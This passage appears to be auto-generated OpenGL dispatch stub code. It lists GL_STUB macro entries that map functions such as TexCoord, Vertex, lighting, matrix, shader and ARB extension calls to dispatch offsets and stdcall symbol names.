GL_STUB(TexCoord1s, _gloffset_TexCoord1s, TexCoord1s@4)
GL_STUB(TexCoord1sv, _gloffset_TexCoord1sv, TexCoord1sv@4)
GL_STUB(TexCoord2d, _gloffset_TexCoord2d, TexCoord2d@16)
GL_STUB(TexCoord2dv, _gloffset_TexCoord2dv, TexCoord2dv@4)
GL_STUB(TexCoord2f, _gloffset_TexCoord2f, TexCoord2f@8)
GL_STUB(TexCoord2fv, _gloffset_TexCoord2fv, TexCoord2fv@4)
GL_STUB(TexCoord2i, _gloffset_TexCoord2i, TexCoord2i@8)
GL_STUB(TexCoord2iv, _gloffset_TexCoord2iv, TexCoord2iv@4)
GL_STUB(TexCoord2s, _gloffset_TexCoord2s, TexCoord2s@8)
GL_STUB(TexCoord2sv, _gloffset_TexCoord2sv, TexCoord2sv@4)
GL_STUB(TexCoord3d, _gloffset_TexCoord3d, TexCoord3d@24)
GL_STUB(TexCoord3dv, _gloffset_TexCoord3dv, TexCoord3dv@4)
GL_STUB(TexCoord3f, _gloffset_TexCoord3f, TexCoord3f@12)
GL_STUB(TexCoord3fv, _gloffset_TexCoord3fv, TexCoord3fv@4)
GL_STUB(TexCoord3i, _gloffset_TexCoord3i, TexCoord3i@12)
GL_STUB(TexCoord3iv, _gloffset_TexCoord3iv, TexCoord3iv@4)
GL_STUB(TexCoord3s, _gloffset_TexCoord3s, TexCoord3s@12)
GL_STUB(TexCoord3sv, _gloffset_TexCoord3sv, TexCoord3sv@4)
GL_STUB(TexCoord4d, _gloffset_TexCoord4d, TexCoord4d@32)
GL_STUB(TexCoord4dv, _gloffset_TexCoord4dv, TexCoord4dv@4)
GL_STUB(TexCoord4f, _gloffset_TexCoord4f, TexCoord4f@16)
GL_STUB(TexCoord4fv, _gloffset_TexCoord4fv, TexCoord4fv@4)
GL_STUB(TexCoord4i, _gloffset_TexCoord4i, TexCoord4i@16)
GL_STUB(TexCoord4iv, _gloffset_TexCoord4iv, TexCoord4iv@4)
GL_STUB(TexCoord4s, _gloffset_TexCoord4s, TexCoord4s@16)
GL_STUB(TexCoord4sv, _gloffset_TexCoord4sv, TexCoord4sv@4)
GL_STUB(Vertex2d, _gloffset_Vertex2d, Vertex2d@16)
GL_STUB(Vertex2dv, _gloffset_Vertex2dv, Vertex2dv@4)
GL_STUB(Vertex2f, _gloffset_Vertex2f, Vertex2f@8)
GL_STUB(Vertex2fv, _gloffset_Vertex2fv, Vertex2fv@4)
GL_STUB(Vertex2i, _gloffset_Vertex2i, Vertex2i@8)
GL_STUB(Vertex2iv, _gloffset_Vertex2iv, Vertex2iv@4)
GL_STUB(Vertex2s, _gloffset_Vertex2s, Vertex2s@8)
GL_STUB(Vertex2sv, _gloffset_Vertex2sv, Vertex2sv@4)
GL_STUB(Vertex3d, _gloffset_Vertex3d, Vertex3d@24)
GL_STUB(Vertex3dv, _gloffset_Vertex3dv, Vertex3dv@4)
GL_STUB(Vertex3f, _gloffset_Vertex3f, Vertex3f@12)
GL_STUB(Vertex3fv, _gloffset_Vertex3fv, Vertex3fv@4)
GL_STUB(Vertex3i, _gloffset_Vertex3i, Vertex3i@12)
GL_STUB(Vertex3iv, _gloffset_Vertex3iv, Vertex3iv@4)
GL_STUB(Vertex3s, _gloffset_Vertex3s, Vertex3s@12)
GL_STUB(Vertex3sv, _gloffset_Vertex3sv, Vertex3sv@4)
GL_STUB(Vertex4d, _gloffset_Vertex4d, Vertex4d@32)
GL_STUB(Vertex4dv, _gloffset_Vertex4dv, Vertex4dv@4)
GL_STUB(Vertex4f, _gloffset_Vertex4f, Vertex4f@16)
GL_STUB(Vertex4fv, _gloffset_Vertex4fv, Vertex4fv@4)
GL_STUB(Vertex4i, _gloffset_Vertex4i, Vertex4i@16)
GL_STUB(Vertex4iv, _gloffset_Vertex4iv, Vertex4iv@4)
GL_STUB(Vertex4s, _gloffset_Vertex4s, Vertex4s@16)
GL_STUB(Vertex4sv, _gloffset_Vertex4sv, Vertex4sv@4)
GL_STUB(ClipPlane, _gloffset_ClipPlane, ClipPlane@8)
GL_STUB(ColorMaterial, _gloffset_ColorMaterial, ColorMaterial@8)
GL_STUB(CullFace, _gloffset_CullFace, CullFace@4)
GL_STUB(Fogf, _gloffset_Fogf, Fogf@8)
GL_STUB(Fogfv, _gloffset_Fogfv, Fogfv@8)
GL_STUB(Fogi, _gloffset_Fogi, Fogi@8)
GL_STUB(Fogiv, _gloffset_Fogiv, Fogiv@8)
GL_STUB(FrontFace, _gloffset_FrontFace, FrontFace@4)
GL_STUB(Hint, _gloffset_Hint, Hint@8)
GL_STUB(Lightf, _gloffset_Lightf, Lightf@12)
GL_STUB(Lightfv, _gloffset_Lightfv, Lightfv@12)
GL_STUB(Lighti, _gloffset_Lighti, Lighti@12)
GL_STUB(Lightiv, _gloffset_Lightiv, Lightiv@12)
GL_STUB(LightModelf, _gloffset_LightModelf, LightModelf@8)
GL_STUB(LightModelfv, _gloffset_LightModelfv, LightModelfv@8)
GL_STUB(LightModeli, _gloffset_LightModeli, LightModeli@8)
GL_STUB(LightModeliv, _gloffset_LightModeliv, LightModeliv@8)
GL_STUB(LineStipple, _gloffset_LineStipple, LineStipple@8)
GL_STUB(LineWidth, _gloffset_LineWidth, LineWidth@4)
GL_STUB(Materialf, _gloffset_Materialf, Materialf@12)
GL_STUB(Materialfv, _gloffset_Materialfv, Materialfv@12)
GL_STUB(Materiali, _gloffset_Materiali, Materiali@12)
GL_STUB(Materialiv, _gloffset_Materialiv, Materialiv@12)
GL_STUB(PointSize, _gloffset_PointSize, PointSize@4)
GL_STUB(PolygonMode, _gloffset_PolygonMode, PolygonMode@8)
GL_STUB(PolygonStipple, _gloffset_PolygonStipple, PolygonStipple@4)
GL_STUB(Scissor, _gloffset_Scissor, Scissor@16)
GL_STUB(ShadeModel, _gloffset_ShadeModel, ShadeModel@4)
GL_STUB(TexParameterf, _gloffset_TexParameterf, TexParameterf@12)
GL_STUB(TexParameterfv, _gloffset_TexParameterfv, TexParameterfv@12)
GL_STUB(TexParameteri, _gloffset_TexParameteri, TexParameteri@12)
GL_STUB(TexParameteriv, _gloffset_TexParameteriv, TexParameteriv@12)
GL_STUB(TexImage1D, _gloffset_TexImage1D, TexImage1D@32)
GL_STUB(TexImage2D, _gloffset_TexImage2D, TexImage2D@36)
GL_STUB(TexEnvf, _gloffset_TexEnvf, TexEnvf@12)
GL_STUB(TexEnvfv, _gloffset_TexEnvfv, TexEnvfv@12)
GL_STUB(TexEnvi, _gloffset_TexEnvi, TexEnvi@12)
GL_STUB(TexEnviv, _gloffset_TexEnviv, TexEnviv@12)
GL_STUB(TexGend, _gloffset_TexGend, TexGend@16)
GL_STUB(TexGendv, _gloffset_TexGendv, TexGendv@12)
GL_STUB(TexGenf, _gloffset_TexGenf, TexGenf@12)
GL_STUB(TexGenfv, _gloffset_TexGenfv, TexGenfv@12)
GL_STUB(TexGeni, _gloffset_TexGeni, TexGeni@12)
GL_STUB(TexGeniv, _gloffset_TexGeniv, TexGeniv@12)
GL_STUB(FeedbackBuffer, _gloffset_FeedbackBuffer, FeedbackBuffer@12)
GL_STUB(SelectBuffer, _gloffset_SelectBuffer, SelectBuffer@8)
GL_STUB(RenderMode, _gloffset_RenderMode, RenderMode@4)
GL_STUB(InitNames, _gloffset_InitNames, InitNames@0)
GL_STUB(LoadName, _gloffset_LoadName, LoadName@4)
GL_STUB(PassThrough, _gloffset_PassThrough, PassThrough@4)
GL_STUB(PopName, _gloffset_PopName, PopName@0)
GL_STUB(PushName, _gloffset_PushName, PushName@4)
GL_STUB(DrawBuffer, _gloffset_DrawBuffer, DrawBuffer@4)
GL_STUB(Clear, _gloffset_Clear, Clear@4)
GL_STUB(ClearAccum, _gloffset_ClearAccum, ClearAccum@16)
GL_STUB(ClearIndex, _gloffset_ClearIndex, ClearIndex@4)
GL_STUB(ClearColor, _gloffset_ClearColor, ClearColor@16)
GL_STUB(ClearStencil, _gloffset_ClearStencil, ClearStencil@4)
GL_STUB(ClearDepth, _gloffset_ClearDepth, ClearDepth@8)
GL_STUB(StencilMask, _gloffset_StencilMask, StencilMask@4)
GL_STUB(ColorMask, _gloffset_ColorMask, ColorMask@16)
GL_STUB(DepthMask, _gloffset_DepthMask, DepthMask@4)
GL_STUB(IndexMask, _gloffset_IndexMask, IndexMask@4)
GL_STUB(Accum, _gloffset_Accum, Accum@8)
GL_STUB(Disable, _gloffset_Disable, Disable@4)
GL_STUB(Enable, _gloffset_Enable, Enable@4)
GL_STUB(Finish, _gloffset_Finish, Finish@0)
GL_STUB(Flush, _gloffset_Flush, Flush@0)
GL_STUB(PopAttrib, _gloffset_PopAttrib, PopAttrib@0)
GL_STUB(PushAttrib, _gloffset_PushAttrib, PushAttrib@4)
GL_STUB(Map1d, _gloffset_Map1d, Map1d@32)
GL_STUB(Map1f, _gloffset_Map1f, Map1f@24)
GL_STUB(Map2d, _gloffset_Map2d, Map2d@56)
GL_STUB(Map2f, _gloffset_Map2f, Map2f@40)
GL_STUB(MapGrid1d, _gloffset_MapGrid1d, MapGrid1d@20)
GL_STUB(MapGrid1f, _gloffset_MapGrid1f, MapGrid1f@12)
GL_STUB(MapGrid2d, _gloffset_MapGrid2d, MapGrid2d@40)
GL_STUB(MapGrid2f, _gloffset_MapGrid2f, MapGrid2f@24)
GL_STUB(EvalCoord1d, _gloffset_EvalCoord1d, EvalCoord1d@8)
GL_STUB(EvalCoord1dv, _gloffset_EvalCoord1dv, EvalCoord1dv@4)
GL_STUB(EvalCoord1f, _gloffset_EvalCoord1f, EvalCoord1f@4)
GL_STUB(EvalCoord1fv, _gloffset_EvalCoord1fv, EvalCoord1fv@4)
GL_STUB(EvalCoord2d, _gloffset_EvalCoord2d, EvalCoord2d@16)
GL_STUB(EvalCoord2dv, _gloffset_EvalCoord2dv, EvalCoord2dv@4)
GL_STUB(EvalCoord2f, _gloffset_EvalCoord2f, EvalCoord2f@8)
GL_STUB(EvalCoord2fv, _gloffset_EvalCoord2fv, EvalCoord2fv@4)
GL_STUB(EvalMesh1, _gloffset_EvalMesh1, EvalMesh1@12)
GL_STUB(EvalPoint1, _gloffset_EvalPoint1, EvalPoint1@4)
GL_STUB(EvalMesh2, _gloffset_EvalMesh2, EvalMesh2@20)
GL_STUB(EvalPoint2, _gloffset_EvalPoint2, EvalPoint2@8)
GL_STUB(AlphaFunc, _gloffset_AlphaFunc, AlphaFunc@8)
GL_STUB(BlendFunc, _gloffset_BlendFunc, BlendFunc@8)
GL_STUB(LogicOp, _gloffset_LogicOp, LogicOp@4)
GL_STUB(StencilFunc, _gloffset_StencilFunc, StencilFunc@12)
GL_STUB(StencilOp, _gloffset_StencilOp, StencilOp@12)
GL_STUB(DepthFunc, _gloffset_DepthFunc, DepthFunc@4)
GL_STUB(PixelZoom, _gloffset_PixelZoom, PixelZoom@8)
GL_STUB(PixelTransferf, _gloffset_PixelTransferf, PixelTransferf@8)
GL_STUB(PixelTransferi, _gloffset_PixelTransferi, PixelTransferi@8)
GL_STUB(PixelStoref, _gloffset_PixelStoref, PixelStoref@8)
GL_STUB(PixelStorei, _gloffset_PixelStorei, PixelStorei@8)
GL_STUB(PixelMapfv, _gloffset_PixelMapfv, PixelMapfv@12)
GL_STUB(PixelMapuiv, _gloffset_PixelMapuiv, PixelMapuiv@12)
GL_STUB(PixelMapusv, _gloffset_PixelMapusv, PixelMapusv@12)
GL_STUB(ReadBuffer, _gloffset_ReadBuffer, ReadBuffer@4)
GL_STUB(CopyPixels, _gloffset_CopyPixels, CopyPixels@20)
GL_STUB(ReadPixels, _gloffset_ReadPixels, ReadPixels@28)
GL_STUB(DrawPixels, _gloffset_DrawPixels, DrawPixels@20)
GL_STUB(GetBooleanv, _gloffset_GetBooleanv, GetBooleanv@8)
GL_STUB(GetClipPlane, _gloffset_GetClipPlane, GetClipPlane@8)
GL_STUB(GetDoublev, _gloffset_GetDoublev, GetDoublev@8)
GL_STUB(GetError, _gloffset_GetError, GetError@0)
GL_STUB(GetFloatv, _gloffset_GetFloatv, GetFloatv@8)
GL_STUB(GetIntegerv, _gloffset_GetIntegerv, GetIntegerv@8)
GL_STUB(GetLightfv, _gloffset_GetLightfv, GetLightfv@12)
GL_STUB(GetLightiv, _gloffset_GetLightiv, GetLightiv@12)
GL_STUB(GetMapdv, _gloffset_GetMapdv, GetMapdv@12)
GL_STUB(GetMapfv, _gloffset_GetMapfv, GetMapfv@12)
GL_STUB(GetMapiv, _gloffset_GetMapiv, GetMapiv@12)
GL_STUB(GetMaterialfv, _gloffset_GetMaterialfv, GetMaterialfv@12)
GL_STUB(GetMaterialiv, _gloffset_GetMaterialiv, GetMaterialiv@12)
GL_STUB(GetPixelMapfv, _gloffset_GetPixelMapfv, GetPixelMapfv@8)
GL_STUB(GetPixelMapuiv, _gloffset_GetPixelMapuiv, GetPixelMapuiv@8)
GL_STUB(GetPixelMapusv, _gloffset_GetPixelMapusv, GetPixelMapusv@8)
GL_STUB(GetPolygonStipple, _gloffset_GetPolygonStipple, GetPolygonStipple@4)
GL_STUB(GetString, _gloffset_GetString, GetString@4)
GL_STUB(GetTexEnvfv, _gloffset_GetTexEnvfv, GetTexEnvfv@12)
GL_STUB(GetTexEnviv, _gloffset_GetTexEnviv, GetTexEnviv@12)
GL_STUB(GetTexGendv, _gloffset_GetTexGendv, GetTexGendv@12)
GL_STUB(GetTexGenfv, _gloffset_GetTexGenfv, GetTexGenfv@12)
GL_STUB(GetTexGeniv, _gloffset_GetTexGeniv, GetTexGeniv@12)
GL_STUB(GetTexImage, _gloffset_GetTexImage, GetTexImage@20)
GL_STUB(GetTexParameterfv, _gloffset_GetTexParameterfv, GetTexParameterfv@12)
GL_STUB(GetTexParameteriv, _gloffset_GetTexParameteriv, GetTexParameteriv@12)
GL_STUB(GetTexLevelParameterfv, _gloffset_GetTexLevelParameterfv, GetTexLevelParameterfv@16)
GL_STUB(GetTexLevelParameteriv, _gloffset_GetTexLevelParameteriv, GetTexLevelParameteriv@16)
GL_STUB(IsEnabled, _gloffset_IsEnabled, IsEnabled@4)
GL_STUB(IsList, _gloffset_IsList, IsList@4)
GL_STUB(DepthRange, _gloffset_DepthRange, DepthRange@16)
GL_STUB(Frustum, _gloffset_Frustum, Frustum@48)
GL_STUB(LoadIdentity, _gloffset_LoadIdentity, LoadIdentity@0)
GL_STUB(LoadMatrixf, _gloffset_LoadMatrixf, LoadMatrixf@4)
GL_STUB(LoadMatrixd, _gloffset_LoadMatrixd, LoadMatrixd@4)
GL_STUB(MatrixMode, _gloffset_MatrixMode, MatrixMode@4)
GL_STUB(MultMatrixf, _gloffset_MultMatrixf, MultMatrixf@4)
GL_STUB(MultMatrixd, _gloffset_MultMatrixd, MultMatrixd@4)
GL_STUB(Ortho, _gloffset_Ortho, Ortho@48)
GL_STUB(PopMatrix, _gloffset_PopMatrix, PopMatrix@0)
GL_STUB(PushMatrix, _gloffset_PushMatrix, PushMatrix@0)
GL_STUB(Rotated, _gloffset_Rotated, Rotated@32)
GL_STUB(Rotatef, _gloffset_Rotatef, Rotatef@16)
GL_STUB(Scaled, _gloffset_Scaled, Scaled@24)
GL_STUB(Scalef, _gloffset_Scalef, Scalef@12)
GL_STUB(Translated, _gloffset_Translated, Translated@24)
GL_STUB(Translatef, _gloffset_Translatef, Translatef@12)
GL_STUB(Viewport, _gloffset_Viewport, Viewport@16)
GL_STUB(ArrayElement, _gloffset_ArrayElement, ArrayElement@4)
GL_STUB(BindTexture, _gloffset_BindTexture, BindTexture@8)
GL_STUB(ColorPointer, _gloffset_ColorPointer, ColorPointer@16)
GL_STUB(DisableClientState, _gloffset_DisableClientState, DisableClientState@4)
GL_STUB(DrawArrays, _gloffset_DrawArrays, DrawArrays@12)
GL_STUB(DrawElements, _gloffset_DrawElements, DrawElements@16)
GL_STUB(EdgeFlagPointer, _gloffset_EdgeFlagPointer, EdgeFlagPointer@8)
GL_STUB(EnableClientState, _gloffset_EnableClientState, EnableClientState@4)
GL_STUB(IndexPointer, _gloffset_IndexPointer, IndexPointer@12)
GL_STUB(Indexub, _gloffset_Indexub, Indexub@4)
GL_STUB(Indexubv, _gloffset_Indexubv, Indexubv@4)
GL_STUB(InterleavedArrays, _gloffset_InterleavedArrays, InterleavedArrays@12)
GL_STUB(NormalPointer, _gloffset_NormalPointer, NormalPointer@12)
GL_STUB(PolygonOffset, _gloffset_PolygonOffset, PolygonOffset@8)
GL_STUB(TexCoordPointer, _gloffset_TexCoordPointer, TexCoordPointer@16)
GL_STUB(VertexPointer, _gloffset_VertexPointer, VertexPointer@16)
GL_STUB(AreTexturesResident, _gloffset_AreTexturesResident, AreTexturesResident@12)
GL_STUB(CopyTexImage1D, _gloffset_CopyTexImage1D, CopyTexImage1D@28)
GL_STUB(CopyTexImage2D, _gloffset_CopyTexImage2D, CopyTexImage2D@32)
GL_STUB(CopyTexSubImage1D, _gloffset_CopyTexSubImage1D, CopyTexSubImage1D@24)
GL_STUB(CopyTexSubImage2D, _gloffset_CopyTexSubImage2D, CopyTexSubImage2D@32)
GL_STUB(DeleteTextures, _gloffset_DeleteTextures, DeleteTextures@8)
GL_STUB(GenTextures, _gloffset_GenTextures, GenTextures@8)
GL_STUB(GetPointerv, _gloffset_GetPointerv, GetPointerv@8)
GL_STUB(IsTexture, _gloffset_IsTexture, IsTexture@4)
GL_STUB(PrioritizeTextures, _gloffset_PrioritizeTextures, PrioritizeTextures@12)
GL_STUB(TexSubImage1D, _gloffset_TexSubImage1D, TexSubImage1D@28)
GL_STUB(TexSubImage2D, _gloffset_TexSubImage2D, TexSubImage2D@36)
GL_STUB(PopClientAttrib, _gloffset_PopClientAttrib, PopClientAttrib@0)
GL_STUB(PushClientAttrib, _gloffset_PushClientAttrib, PushClientAttrib@4)
GL_STUB(BlendColor, _gloffset_BlendColor, BlendColor@16)
GL_STUB(BlendEquation, _gloffset_BlendEquation, BlendEquation@4)
GL_STUB(DrawRangeElements, _gloffset_DrawRangeElements, DrawRangeElements@24)
GL_STUB(ColorTable, _gloffset_ColorTable, ColorTable@24)
GL_STUB(ColorTableParameterfv, _gloffset_ColorTableParameterfv, ColorTableParameterfv@12)
GL_STUB(ColorTableParameteriv, _gloffset_ColorTableParameteriv, ColorTableParameteriv@12)
GL_STUB(CopyColorTable, _gloffset_CopyColorTable, CopyColorTable@20)
GL_STUB(GetColorTable, _gloffset_GetColorTable, GetColorTable@16)
GL_STUB(GetColorTableParameterfv, _gloffset_GetColorTableParameterfv, GetColorTableParameterfv@12)
GL_STUB(GetColorTableParameteriv, _gloffset_GetColorTableParameteriv, GetColorTableParameteriv@12)
GL_STUB(ColorSubTable, _gloffset_ColorSubTable, ColorSubTable@24)
GL_STUB(CopyColorSubTable, _gloffset_CopyColorSubTable, CopyColorSubTable@20)
GL_STUB(ConvolutionFilter1D, _gloffset_ConvolutionFilter1D, ConvolutionFilter1D@24)
GL_STUB(ConvolutionFilter2D, _gloffset_ConvolutionFilter2D, ConvolutionFilter2D@28)
GL_STUB(ConvolutionParameterf, _gloffset_ConvolutionParameterf, ConvolutionParameterf@12)
GL_STUB(ConvolutionParameterfv, _gloffset_ConvolutionParameterfv, ConvolutionParameterfv@12)
GL_STUB(ConvolutionParameteri, _gloffset_ConvolutionParameteri, ConvolutionParameteri@12)
GL_STUB(ConvolutionParameteriv, _gloffset_ConvolutionParameteriv, ConvolutionParameteriv@12)
GL_STUB(CopyConvolutionFilter1D, _gloffset_CopyConvolutionFilter1D, CopyConvolutionFilter1D@20)
GL_STUB(CopyConvolutionFilter2D, _gloffset_CopyConvolutionFilter2D, CopyConvolutionFilter2D@24)
GL_STUB(GetConvolutionFilter, _gloffset_GetConvolutionFilter, GetConvolutionFilter@16)
GL_STUB(GetConvolutionParameterfv, _gloffset_GetConvolutionParameterfv, GetConvolutionParameterfv@12)
GL_STUB(GetConvolutionParameteriv, _gloffset_GetConvolutionParameteriv, GetConvolutionParameteriv@12)
GL_STUB(GetSeparableFilter, _gloffset_GetSeparableFilter, GetSeparableFilter@24)
GL_STUB(SeparableFilter2D, _gloffset_SeparableFilter2D, SeparableFilter2D@32)
GL_STUB(GetHistogram, _gloffset_GetHistogram, GetHistogram@20)
GL_STUB(GetHistogramParameterfv, _gloffset_GetHistogramParameterfv, GetHistogramParameterfv@12)
GL_STUB(GetHistogramParameteriv, _gloffset_GetHistogramParameteriv, GetHistogramParameteriv@12)
GL_STUB(GetMinmax, _gloffset_GetMinmax, GetMinmax@20)
GL_STUB(GetMinmaxParameterfv, _gloffset_GetMinmaxParameterfv, GetMinmaxParameterfv@12)
GL_STUB(GetMinmaxParameteriv, _gloffset_GetMinmaxParameteriv, GetMinmaxParameteriv@12)
GL_STUB(Histogram, _gloffset_Histogram, Histogram@16)
GL_STUB(Minmax, _gloffset_Minmax, Minmax@12)
GL_STUB(ResetHistogram, _gloffset_ResetHistogram, ResetHistogram@4)
GL_STUB(ResetMinmax, _gloffset_ResetMinmax, ResetMinmax@4)
GL_STUB(TexImage3D, _gloffset_TexImage3D, TexImage3D@40)
GL_STUB(TexSubImage3D, _gloffset_TexSubImage3D, TexSubImage3D@44)
GL_STUB(CopyTexSubImage3D, _gloffset_CopyTexSubImage3D, CopyTexSubImage3D@36)
GL_STUB(ActiveTextureARB, _gloffset_ActiveTextureARB, ActiveTextureARB@4)
GL_STUB(ClientActiveTextureARB, _gloffset_ClientActiveTextureARB, ClientActiveTextureARB@4)
GL_STUB(MultiTexCoord1dARB, _gloffset_MultiTexCoord1dARB, MultiTexCoord1dARB@12)
GL_STUB(MultiTexCoord1dvARB, _gloffset_MultiTexCoord1dvARB, MultiTexCoord1dvARB@8)
GL_STUB(MultiTexCoord1fARB, _gloffset_MultiTexCoord1fARB, MultiTexCoord1fARB@8)
GL_STUB(MultiTexCoord1fvARB, _gloffset_MultiTexCoord1fvARB, MultiTexCoord1fvARB@8)
GL_STUB(MultiTexCoord1iARB, _gloffset_MultiTexCoord1iARB, MultiTexCoord1iARB@8)
GL_STUB(MultiTexCoord1ivARB, _gloffset_MultiTexCoord1ivARB, MultiTexCoord1ivARB@8)
GL_STUB(MultiTexCoord1sARB, _gloffset_MultiTexCoord1sARB, MultiTexCoord1sARB@8)
GL_STUB(MultiTexCoord1svARB, _gloffset_MultiTexCoord1svARB, MultiTexCoord1svARB@8)
GL_STUB(MultiTexCoord2dARB, _gloffset_MultiTexCoord2dARB, MultiTexCoord2dARB@20)
GL_STUB(MultiTexCoord2dvARB, _gloffset_MultiTexCoord2dvARB, MultiTexCoord2dvARB@8)
GL_STUB(MultiTexCoord2fARB, _gloffset_MultiTexCoord2fARB, MultiTexCoord2fARB@12)
GL_STUB(MultiTexCoord2fvARB, _gloffset_MultiTexCoord2fvARB, MultiTexCoord2fvARB@8)
GL_STUB(MultiTexCoord2iARB, _gloffset_MultiTexCoord2iARB, MultiTexCoord2iARB@12)
GL_STUB(MultiTexCoord2ivARB, _gloffset_MultiTexCoord2ivARB, MultiTexCoord2ivARB@8)
GL_STUB(MultiTexCoord2sARB, _gloffset_MultiTexCoord2sARB, MultiTexCoord2sARB@12)
GL_STUB(MultiTexCoord2svARB, _gloffset_MultiTexCoord2svARB, MultiTexCoord2svARB@8)
GL_STUB(MultiTexCoord3dARB, _gloffset_MultiTexCoord3dARB, MultiTexCoord3dARB@28)
GL_STUB(MultiTexCoord3dvARB, _gloffset_MultiTexCoord3dvARB, MultiTexCoord3dvARB@8)
GL_STUB(MultiTexCoord3fARB, _gloffset_MultiTexCoord3fARB, MultiTexCoord3fARB@16)
GL_STUB(MultiTexCoord3fvARB, _gloffset_MultiTexCoord3fvARB, MultiTexCoord3fvARB@8)
GL_STUB(MultiTexCoord3iARB, _gloffset_MultiTexCoord3iARB, MultiTexCoord3iARB@16)
GL_STUB(MultiTexCoord3ivARB, _gloffset_MultiTexCoord3ivARB, MultiTexCoord3ivARB@8)
GL_STUB(MultiTexCoord3sARB, _gloffset_MultiTexCoord3sARB, MultiTexCoord3sARB@16)
GL_STUB(MultiTexCoord3svARB, _gloffset_MultiTexCoord3svARB, MultiTexCoord3svARB@8)
GL_STUB(MultiTexCoord4dARB, _gloffset_MultiTexCoord4dARB, MultiTexCoord4dARB@36)
GL_STUB(MultiTexCoord4dvARB, _gloffset_MultiTexCoord4dvARB, MultiTexCoord4dvARB@8)
GL_STUB(MultiTexCoord4fARB, _gloffset_MultiTexCoord4fARB, MultiTexCoord4fARB@20)
GL_STUB(MultiTexCoord4fvARB, _gloffset_MultiTexCoord4fvARB, MultiTexCoord4fvARB@8)
GL_STUB(MultiTexCoord4iARB, _gloffset_MultiTexCoord4iARB, MultiTexCoord4iARB@20)
GL_STUB(MultiTexCoord4ivARB, _gloffset_MultiTexCoord4ivARB, MultiTexCoord4ivARB@8)
GL_STUB(MultiTexCoord4sARB, _gloffset_MultiTexCoord4sARB, MultiTexCoord4sARB@20)
GL_STUB(MultiTexCoord4svARB, _gloffset_MultiTexCoord4svARB, MultiTexCoord4svARB@8)
GL_STUB(AttachShader, _gloffset_AttachShader, AttachShader@8)
GL_STUB(CreateProgram, _gloffset_CreateProgram, CreateProgram@0)
GL_STUB(CreateShader, _gloffset_CreateShader, CreateShader@4)
GL_STUB(DeleteProgram, _gloffset_DeleteProgram, DeleteProgram@4)
GL_STUB(DeleteShader, _gloffset_DeleteShader, DeleteShader@4)
GL_STUB(DetachShader, _gloffset_DetachShader, DetachShader@8)
GL_STUB(GetAttachedShaders, _gloffset_GetAttachedShaders, GetAttachedShaders@16)
GL_STUB(GetProgramInfoLog, _gloffset_GetProgramInfoLog, GetProgramInfoLog@16)
GL_STUB(GetProgramiv, _gloffset_GetProgramiv, GetProgramiv@12)
GL_STUB(GetShaderInfoLog, _gloffset_GetShaderInfoLog, GetShaderInfoLog@16)
GL_STUB(GetShaderiv, _gloffset_GetShaderiv, GetShaderiv@12)
GL_STUB(IsProgram, _gloffset_IsProgram, IsProgram@4)
GL_STUB(IsShader, _gloffset_IsShader, IsShader@4)
GL_STUB(StencilFuncSeparate, _gloffset_StencilFuncSeparate, StencilFuncSeparate@16)
GL_STUB(StencilMaskSeparate, _gloffset_StencilMaskSeparate, StencilMaskSeparate@8)
GL_STUB(StencilOpSeparate, _gloffset_StencilOpSeparate, StencilOpSeparate@16)
GL_STUB(UniformMatrix2x3fv, _gloffset_UniformMatrix2x3fv, UniformMatrix2x3fv@16)
GL_STUB(UniformMatrix2x4fv, _gloffset_UniformMatrix2x4fv, UniformMatrix2x4fv@16)
GL_STUB(UniformMatrix3x2fv, _gloffset_UniformMatrix3x2fv, UniformMatrix3x2fv@16)
GL_STUB(UniformMatrix3x4fv, _gloffset_UniformMatrix3x4fv, UniformMatrix3x4fv@16)
GL_STUB(UniformMatrix4x2fv, _gloffset_UniformMatrix4x2fv, UniformMatrix4x2fv@16)
GL_STUB(UniformMatrix4x3fv, _gloffset_UniformMatrix4x3fv, UniformMatrix4x3fv@16)
GL_STUB(LoadTransposeMatrixdARB, _gloffset_LoadTransposeMatrixdARB, LoadTransposeMatrixdARB@4)
GL_STUB(LoadTransposeMatrixfARB, _gloffset_LoadTransposeMatrixfARB, LoadTransposeMatrixfARB@4)
GL_STUB(MultTransposeMatrixdARB, _gloffset_MultTransposeMatrixdARB, MultTransposeMatrixdARB@4)
GL_STUB(MultTransposeMatrixfARB, _gloffset_MultTransposeMatrixfARB, MultTransposeMatrixfARB@4)
GL_STUB(SampleCoverageARB, _gloffset_SampleCoverageARB, SampleCoverageARB@8)
GL_STUB(CompressedTexImage1DARB, _gloffset_CompressedTexImage1DARB, CompressedTexImage1DARB@28)
GL_STUB(CompressedTexImage2DARB, _gloffset_CompressedTexImage2DARB, CompressedTexImage2DARB@32)
GL_STUB(CompressedTexImage3DARB, _gloffset_CompressedTexImage3DARB, CompressedTexImage3DARB@36)
GL_STUB(CompressedTexSubImage1DARB, _gloffset_CompressedTexSubImage1DARB, CompressedTexSubImage1DARB@28)
GL_STUB(CompressedTexSubImage2DARB, _gloffset_CompressedTexSubImage2DARB, CompressedTexSubImage2DARB@36)
GL_STUB(CompressedTexSubImage3DARB, _gloffset_CompressedTexSubImage3DARB, CompressedTexSubImage3DARB@44)
GL_STUB(GetCompressedTexImageARB, _gloffset_GetCompressedTexImageARB, GetCompressedTexImageARB@12)
GL_STUB(DisableVertexAttribArrayARB, _gloffset_DisableVertexAttribArrayARB, DisableVertexAttribArrayARB@4)
GL_STUB(EnableVertexAttribArrayARB, _gloffset_EnableVertexAttribArrayARB, EnableVertexAttribArrayARB@4)
GL_STUB(GetProgramEnvParameterdvARB, _gloffset_GetProgramEnvParameterdvARB, GetProgramEnvParameterdvARB@12)
GL_STUB(GetProgramEnvParameterfvARB, _gloffset_GetProgramEnvParameterfvARB, GetProgramEnvParameterfvARB@12)
GL_STUB(GetProgramLocalParameterdvARB, _gloffset_GetProgramLocalParameterdvARB, GetProgramLocalParameterdvARB@12)
GL_STUB(GetProgramLocalParameterfvARB, _gloffset_GetProgramLocalParameterfvARB, GetProgramLocalParameterfvARB@12)
GL_STUB(GetProgramStringARB, _gloffset_GetProgramStringARB, GetProgramStringARB@12)
GL_STUB(GetProgramivARB, _gloffset_GetProgramivARB, GetProgramivARB@12)
GL_STUB(GetVertexAttribdvARB, _gloffset_GetVertexAttribdvARB, GetVertexAttribdvARB@12)
GL_STUB(GetVertexAttribfvARB, _gloffset_GetVertexAttribfvARB, GetVertexAttribfvARB@12)
GL_STUB(GetVertexAttribivARB, _gloffset_GetVertexAttribivARB, GetVertexAttribivARB@12)
GL_STUB(ProgramEnvParameter4dARB, _gloffset_ProgramEnvParameter4dARB, ProgramEnvParameter4dARB@40)
